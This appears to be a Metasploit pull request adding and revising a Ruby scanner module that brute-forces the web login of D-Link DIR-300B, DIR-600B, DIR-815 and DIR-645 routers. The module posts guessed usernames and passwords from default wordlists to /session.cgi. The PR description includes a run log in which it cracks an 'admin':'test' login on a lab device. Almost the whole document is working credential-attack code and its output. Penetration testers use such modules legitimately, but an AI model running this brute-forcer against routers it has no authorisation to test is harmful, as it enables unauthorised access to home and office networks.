### PR TITLE
http login module for DLink DIR300revB, DIR600revB, DIR815

### DIFF
--- a/modules/auxiliary/scanner/http/dlink_dir_300b_600b_815_http_login.rb
+++ b/modules/auxiliary/scanner/http/dlink_dir_300b_600b_815_http_login.rb
@@ -20,8 +20,13 @@ class Metasploit3 < Msf::Auxiliary
 
 	def initialize
 		super(
-			'Name'           => 'DLink DIR 300B / DIR 600B / DIR 815 HTTP Login Utility',
-			'Description'    => 'This module attempts to authenticate to different DLink HTTP management services.',
+			'Name'           => 'DLink DIR-300B / DIR-600B / DIR-815 HTTP Login Utility',
+			'Description'    => %q{
+					This module attempts to authenticate to different DLink HTTP management services.
+					Tested devices: D-Link DIR-300 Hardware revision B, D-Link DIR-600 Hardware revision B
+					and D-Link DIR-815 Hardware revision A. It is possible that this module also works with
+					other models.
+					},
 			'Author'         => [
 					'hdm',	#http_login module
 					'Michael Messner <devnull@s3cur1ty.de>'	#dlink login included
@@ -35,10 +40,7 @@ class Metasploit3 < Msf::Auxiliary
 
 		register_options(
 			[
-				OptPath.new('USERPASS_FILE',  [ false, "File containing users and passwords separated by space, one pair per line",
-					File.join(Msf::Config.install_root, "data", "wordlists", "http_default_userpass.txt") ]),
-				OptPath.new('USER_FILE',  [ false, "File containing users, one per line",
-					File.join(Msf::Config.install_root, "data", "wordlists", "http_default_users.txt") ]),
+				OptString.new('USERNAME',  [ false, "Username for authentication (default: admin)","admin" ]),
 				OptPath.new('PASS_FILE',  [ false, "File containing passwords, one per line",
 					File.join(Msf::Config.install_root, "data", "wordlists", "http_default_pass.txt") ]),
 			], self.class)

--- a/modules/auxiliary/scanner/http/dlink_dir_300b_600b_815_http_login.rb
+++ b/modules/auxiliary/scanner/http/dlink_dir_300b_600b_815_http_login.rb
@@ -1,0 +1,146 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+
+require 'msf/core'
+require 'rex/proto/ntlm/message'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Report
+	include Msf::Auxiliary::AuthBrute
+
+	include Msf::Auxiliary::Scanner
+
+	def initialize
+		super(
+			'Name'           => 'DLink DIR 300B / DIR 600B / DIR 815 HTTP Login Utility',
+			'Description'    => 'This module attempts to authenticate to different DLink HTTP management services.',
+			'Author'         => [
+					'hdm',	#http_login module
+					'Michael Messner <devnull@s3cur1ty.de>'	#dlink login included
+				],
+			'References'     =>
+				[
+					[ 'CVE', '1999-0502'] # Weak password
+				],
+			'License'        => MSF_LICENSE
+		)
+
+		register_options(
+			[
+				OptPath.new('USERPASS_FILE',  [ false, "File containing users and passwords separated by space, one pair per line",
+					File.join(Msf::Config.install_root, "data", "wordlists", "http_default_userpass.txt") ]),
+				OptPath.new('USER_FILE',  [ false, "File containing users, one per line",
+					File.join(Msf::Config.install_root, "data", "wordlists", "http_default_users.txt") ]),
+				OptPath.new('PASS_FILE',  [ false, "File containing passwords, one per line",
+					File.join(Msf::Config.install_root, "data", "wordlists", "http_default_pass.txt") ]),
+			], self.class)
+	end
+
+	def target_url
+		proto = "http"
+		if rport == 443 or ssl
+			proto = "https"
+		end
+		"#{proto}://#{rhost}:#{rport}#{@uri.to_s}"
+	end
+
+	def run_host(ip)
+
+		@uri = "/session.cgi"
+
+		print_status("Attempting to login to #{target_url}")
+
+		each_user_pass { |user, pass|
+			do_login(user, pass)
+		}
+	end
+
+	#default to user=admin without password (default on most dlink routers)
+	def do_login(user='admin', pass='')
+		vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
+
+		response  = do_http_login(user,pass)
+		result = determine_result(response)
+
+		if result == :success
+			print_good("#{target_url} - Successful login '#{user}' : '#{pass}'")
+
+			any_user = false
+			any_pass = false
+
+			vprint_status("#{target_url} - Trying random username with password:'#{pass}'")
+			any_user  =  determine_result(do_http_login(Rex::Text.rand_text_alpha(8), pass))
+
+			vprint_status("#{target_url} - Trying username:'#{user}' with random password")
+			any_pass  = determine_result(do_http_login(user, Rex::Text.rand_text_alpha(8)))
+
+			if any_user == :success
+				user = "anyuser"
+				print_status("#{target_url} - Any username with password '#{pass}' is allowed")
+			else
+				print_status("#{target_url} - Random usernames are not allowed.")
+			end
+
+			if any_pass == :success
+				pass = "anypass"
+				print_status("#{target_url} - Any password with username '#{user}' is allowed")
+			else
+				print_status("#{target_url} - Random passwords are not allowed.")
+			end
+
+			report_auth_info(
+				:host   => rhost,
+				:port   => rport,
+				:sname => (ssl ? 'https' : 'http'),
+				:user   => user,
+				:pass   => pass,
+				:proof  => "WEBAPP=\"Generic\", PROOF=#{response.to_s}",
+				:active => true
+			)
+
+			return :abort if ([any_user,any_pass].include? :success)
+			return :next_user
+		else
+			vprint_error("#{target_url} - Failed to login as '#{user}'")
+			return
+		end
+	end
+
+	def do_http_login(user,pass)
+		begin
+			response = send_request_cgi({
+				'uri' => @uri,
+				'method' => 'POST',
+				'vars_post' => {
+					"REPORT_METHOD" => "xml",
+					"ACTION" => "login_plaintext",
+					"USER" => user,
+					"PASSWD" => pass,
+					"CAPTCHA" => ""
+				}
+			})
+			return response
+		rescue ::Rex::ConnectionError
+			vprint_error("#{target_url} - Failed to connect to the web server")
+			return nil
+		end
+	end
+
+	def determine_result(response)
+		return :abort unless response.kind_of? Rex::Proto::Http::Response
+		return :abort unless response.code
+		if response.body =~ /\<RESULT\>SUCCESS\<\/RESULT\>/
+			return :success
+		end
+		return :fail
+	end
+
+end

--- a/modules/auxiliary/scanner/http/dlink_dir_300b_600b_815_http_login.rb
+++ b/modules/auxiliary/scanner/http/dlink_dir_300b_600b_815_http_login.rb
@@ -20,12 +20,12 @@ class Metasploit3 < Msf::Auxiliary
 
 	def initialize
 		super(
-			'Name'           => 'DLink DIR-300B / DIR-600B / DIR-815 HTTP Login Utility',
+			'Name'           => 'DLink DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility',
 			'Description'    => %q{
 					This module attempts to authenticate to different DLink HTTP management services.
-					Tested devices: D-Link DIR-300 Hardware revision B, D-Link DIR-600 Hardware revision B
-					and D-Link DIR-815 Hardware revision A. It is possible that this module also works with
-					other models.
+					Tested devices: D-Link DIR-300 Hardware revision B, D-Link DIR-600 Hardware revision B,
+					D-Link DIR-815 Hardware revision A and DIR-645 Hardware revision A. 
+					It is possible that this module also works with	other models.
 					},
 			'Author'         => [
 					'hdm',	#http_login module

--- a/modules/auxiliary/scanner/http/dlink_dir_300b_600b_815_http_login.rb
+++ b/modules/auxiliary/scanner/http/dlink_dir_300b_600b_815_http_login.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary
 		else
 			return false
 		end
-	end 
+	end
 
 	def run_host(ip)
 
@@ -78,7 +78,7 @@ class Metasploit3 < Msf::Auxiliary
 			return
 		end
 
-		print_status("#{target_url} - Attempting to login") 
+		print_status("#{target_url} - Attempting to login")
 
 		each_user_pass { |user, pass|
 			do_login(user, pass)


### PR DESCRIPTION
tested on DIR300 rev B, DIR 600 rev B and DIR 815:

DIR 600:

Exploiting Demo - 192.168.178.105 / 0 auxiliary(dlink_dir_300b_600b_http_login) > run

[_] Attempting to login to http://192.168.178.133:80/session.cgi
[_] 192.168.178.133:80 DLINK_DIR_300B_600B_HTTP - [1/3] - /session.cgi - Trying username:'admin' with password:''
[-] 192.168.178.133:80 DLINK_DIR_300B_600B_HTTP - [1/3] - /session.cgi - Failed to login as 'admin'
[_] 192.168.178.133:80 DLINK_DIR_300B_600B_HTTP - [2/3] - /session.cgi - Trying username:'admin' with password:'admin'
[-] 192.168.178.133:80 DLINK_DIR_300B_600B_HTTP - [2/3] - /session.cgi - Failed to login as 'admin'
[_] 192.168.178.133:80 DLINK_DIR_300B_600B_HTTP - [3/3] - /session.cgi - Trying username:'admin' with password:'test'
[+] http://192.168.178.133:80/session.cgi - Successful login 'admin' : 'test'
[_] 192.168.178.133:80 DLINK_DIR_300B_600B_HTTP - [3/3] - /session.cgi - Trying random username with password:'test'
[_] 192.168.178.133:80 DLINK_DIR_300B_600B_HTTP - [3/3] - /session.cgi - Trying username:'admin' with random password
[_] http://192.168.178.133:80/session.cgi - Random usernames are not allowed.
[_] http://192.168.178.133:80/session.cgi - Random passwords are not allowed.
[_] Scanned 1 of 1 hosts (100% complete)
[_] Auxiliary module execution completed
